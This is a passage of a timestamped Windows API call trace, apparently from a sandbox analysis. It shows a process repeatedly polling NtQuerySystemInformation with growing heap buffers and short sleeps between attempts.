0x295d3f0 [0249.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0249.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0249.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0249.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0249.988] Sleep (dwMilliseconds=0x110) [0250.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0250.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0250.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0250.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0250.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0250.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0250.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0250.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0250.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.003] Sleep (dwMilliseconds=0x110) [0250.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0250.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0250.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0250.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0250.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0250.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0250.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0250.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0250.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.019] Sleep (dwMilliseconds=0x110) [0250.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0250.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0250.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0250.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0250.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0250.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0250.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0250.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0250.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.034] Sleep (dwMilliseconds=0x110) [0250.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0250.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0250.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0250.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0250.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0250.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0250.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0250.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0250.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.053] Sleep (dwMilliseconds=0x110) [0250.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0250.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0250.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0250.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0250.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0250.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0250.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0250.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0250.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.068] Sleep (dwMilliseconds=0x110) [0250.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0250.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0250.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0250.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0250.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0250.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0250.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0250.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0250.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.082] Sleep (dwMilliseconds=0x110) [0250.120] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0250.120] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0250.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0250.121] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0250.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0250.121] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0250.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0250.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0250.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.125] Sleep (dwMilliseconds=0x110) [0250.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0250.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.138] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0250.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0250.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0250.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0250.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0250.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0250.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0250.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.141] Sleep (dwMilliseconds=0x110) [0250.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0250.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0250.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0250.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0250.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0250.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0250.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0250.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0250.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.172] Sleep (dwMilliseconds=0x110) [0250.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0250.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0250.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0250.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0250.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0250.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0250.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0250.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0250.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.188] Sleep (dwMilliseconds=0x110) [0250.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0250.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0250.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0250.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0250.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0250.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0250.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0250.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0250.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.208] Sleep (dwMilliseconds=0x110) [0250.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0250.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0250.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0250.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0250.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0250.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0250.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0250.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0250.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.219] Sleep (dwMilliseconds=0x110) [0250.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0250.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0250.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0250.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0250.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0250.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0250.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0250.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0250.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0250.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0250.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0250.238] Sleep (dwMilliseconds=0x110) [0250.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0250.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.247] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0250.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0250.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0250.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0250.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0250.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 